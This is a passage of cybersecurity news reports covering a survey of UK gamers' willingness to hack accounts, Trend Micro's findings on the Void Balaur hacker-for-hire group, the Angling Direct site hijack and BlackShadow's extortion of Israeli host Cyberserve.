The study also revealed remarkable conclusions about gamer-to-gamer cyber risks as well as the extents gamers would go to win. More than a quarter of British gamers polled (28%) are at least slightly likely to hack into a friend's, family member's, or romantic partner's gaming account if they knew that it would give a competitive benefit in an online video game. This perception is much more pronounced among hardcore gamers, with approximately half of those polled (48 percent) simply stating they are at least somewhat likely, highlighting serious gamers' tenacity to win. 

“These findings are jarring, but there are some gamers out there that will do whatever it takes to win,” said BigCheeseKIT, gamer, and Twitch streamer. “I’ve learned that when you’re gaming online, it’s so important to be mindful of who you are friends with online and what information you share when gaming online. While this is especially true for professional gamers who have that public profile, it’s clear this goes for any online gamer.” 

The competitive spirit pervades all sorts of gamers, from casual to diehard. If they knew it would give them a competitive advantage, nearly half of UK gamers polled (43 percent) said that they are at least somewhat probable to exploit loopholes or technical problems in a game, and nearly one-third (34 percent) would download cheats to their gaming account or systems, pay to take possession of some other user's gaming account (30 percent), or hack into a spontaneous player's gaming account (29 percent ). 

“Scammers know that – for both experienced and casual gamers – cheats, skins, and limited edition items are highly sought after,” said Armin Buescher, Technical Director at NortonLifeLock. “Offering these competitive boosts is a perfect opportunity to share malicious links or trick gamers into downloading malware that, if successful, can rob players of their gaming profile, personal information, or more. Having security that specifically helps protect against these threats can give players peace of mind so they can focus on the enjoyment of the game itself.”

"Void Balaur" Cyber Mercenary Group Unveiled by Trend Micro

 

In some kind of a prolific campaign of economically motivated attacks that has been continuing since 2015, a hacker-for-hire operation provided by cyber mercenaries has attacked thousands of individuals and organizations throughout the world. 

Human rights activists, journalists, legislators, telecommunications experts, and medical professionals are among those attacked by the gang, according to Trend Micro cybersecurity analysts. It's been named Void Balaur, after a multi-headed beast from Slavic legend. 

Since 2018, the cyber-mercenary gang has advertised its activities on Russian-language forums. Hacking into the email and social media profiles, as well as obtaining and selling critical personal and financial information, are among the main services provided. These attacks will also put information-stealing software onto victims' devices occasionally. 

It appears that it makes little difference whoever the targets are, as long as those behind the assaults are compensated by their employers. Only a few missions are active at any one moment, but those that are, command Void Balaur's undivided attention for the time being. 

"There will just be a dozen targets a day, usually less. But those targets are high-profile targets -- we found government ministers, members of parliaments, a lot of people from the media, and a lot of medical doctors," Feike Hacquebord, senior threat researcher for Trend Micro told. 

Among those attacked are a former intelligence chief and five active members of the administration in an undisclosed European country. People and institutions being targeted are located all over the world, including North America, Europe, Russia, and India, to name a few. 

Several of the cyberattacks seem to be politically motivated, aimed against persons in nations in which the victim's human rights may be infringed by governments if they are revealed. Several Void Balaur attacks, like other harmful hacking activities, begin with phishing emails that are targeted at the selected victim. The organization claims to be able to get access to certain email accounts with no user input at all and to be selling this service at a premium fee compared to prior attacks. 

Many campaigns run for a substantial amount of time. One such targeting an undisclosed huge conglomerate in Russia, for example, remained active from at least September 2020 to August 2021 and targeted not only the owners of the enterprises but also their family members and senior members of all the enterprises within the corporate name. 

"There's a set of companies owned by one person and his family members were targeted, the CEOs of the companies were being targeted, and that all happens over more than one year," said Hacquebord.

Angling Direct Hacked: Website Visitors Directed to Pornhub

 

Wrongdoers have taken over Angling Direct's computers, redirecting visitors from its websites to Pornhub, and threatened to delete its internal information. In addition to the website redirect, their Twitter account has also been hijacked, referencing a porn site and posting contact information for the attacker. 

The London Stock Exchange-listed supplier of fishing gear and equipment said it is now handling a cyber security problem after they found suspicious activity on its network late Friday, November 05.

It further told the City: "This unauthorized activity shut down the Company's websites and these remain inactive. Some of the Company's social media accounts have also been compromised. The Board has appointed external cyber security specialists whose investigations are underway to establish what happened. Work continues round the clock to bring the websites back online while our 39 retail stores across the UK have remained open and continue to trade." 

However, Angling Direct stated that it is unclear whether any personal information has been hacked - and that no payment information has been exposed. The attacker also included an email address and a promise to return "information and access" to the website. There were no public ransom requests. 

Apart from the phishing, this incident will send chills down the spines of firm executives. Indeed, this assault has all the signs of an immature adolescent hacker having a good time, but it is undoubtedly generating major issues for the victim. 

The team has further informed that indicators point to staff login credentials being taken, permitting hackers to take over the company's website and, simultaneously, its Twitter account. The motivation is clear: cybercriminals want to be compensated before relinquishing control to the company. 

In the meanwhile, the firm is losing a lot of money on prospective sales, not to mention trust and brand harm, as clients feel embarrassed or worse when they visit an explicit website by accident.

In a statement, the company said: "We are mindful of our obligations regarding data; it is too soon yet to make any determination around the impact this incident has had on personal data. Importantly, the company does not hold any customer financial data, as our website transactions are handled by third parties."

BlackShadow Hacker Organization Hijacked Cyberserve Firm

 

The Israeli hosting provider Cyberserve has been hacked by the BlackShadow - an Iranian state-sponsored hacking organization to acquire client records and impair the company's services. 

Cyberserve is a web development and hosting company headquartered in Israel that is employed by a variety of organizations, including local radio stations, museums, and educational establishments. 

Beginning on Friday 29th of October, users seeking to access the website hosted by Cyberserve were faced with website problems and notifications indicating that the site was unreachable due to some kind of cybersecurity problem. 

A hacker organization known as BlackShadow claimed credit for the Cyberserve assault and is extorting the hosting firm as well as its users for $1 million in bitcoin in exchange for not leaking stolen data. 

The extortion demand had a 48-hour deadline beginning on Saturday 30th of October, but the hackers almost instantly disclosed a sample of 1,000 documents to establish their point. 

A database holding the personally identifiable information of a big LGBT site called 'Atraf' was stolen as part of the data breach, making the security event highly serious. Putting LGBT individuals in traditional communities at-risk places them in a situation of danger, both physically and mentally. 

"Atraf's team did not contact us for any deals yet so we collected 50 famous Israeli that were surfing and we leak their video's," threatened the hacking group on Telegram. A number of websites hosted by CyberServe, including Atraf, are offline, suggesting that the firm is still addressing the attack. 

This assault has also impacted the following websites: 

  • The Kavim (Dan Bus) public transportation firm. 
  • The Kan public broadcaster. 
  • The Pegasus travel agency. 
  • The Holon Children's Museum. 

BlackShadow is an Iranian state-sponsored hacker outfit with verified ties to the Pay2Key ransomware strain, that has been used against Israeli targets on many occasions. In contrast to traditional ransomware assaults, the threat actors driving BlackShadow are not thought to be monetarily motivated. 

According to Omri Segev Moyal, co-founder and CEO of Israeli cybersecurity firm Profero, these hacker organizations' activities are retaliatory and intended to undermine Israeli interests. 

"The recent attacks from the so-called 'BlackShadow' are just another cycle of the clandestine Iran-Israeli war. It’s a well-constructed InfoOp combined with very weak hacking skills to hurt Israel. We assume the current cycle is also in retaliation for the attack against the gas pumps in Iran last week." - Omri Segev Moyal.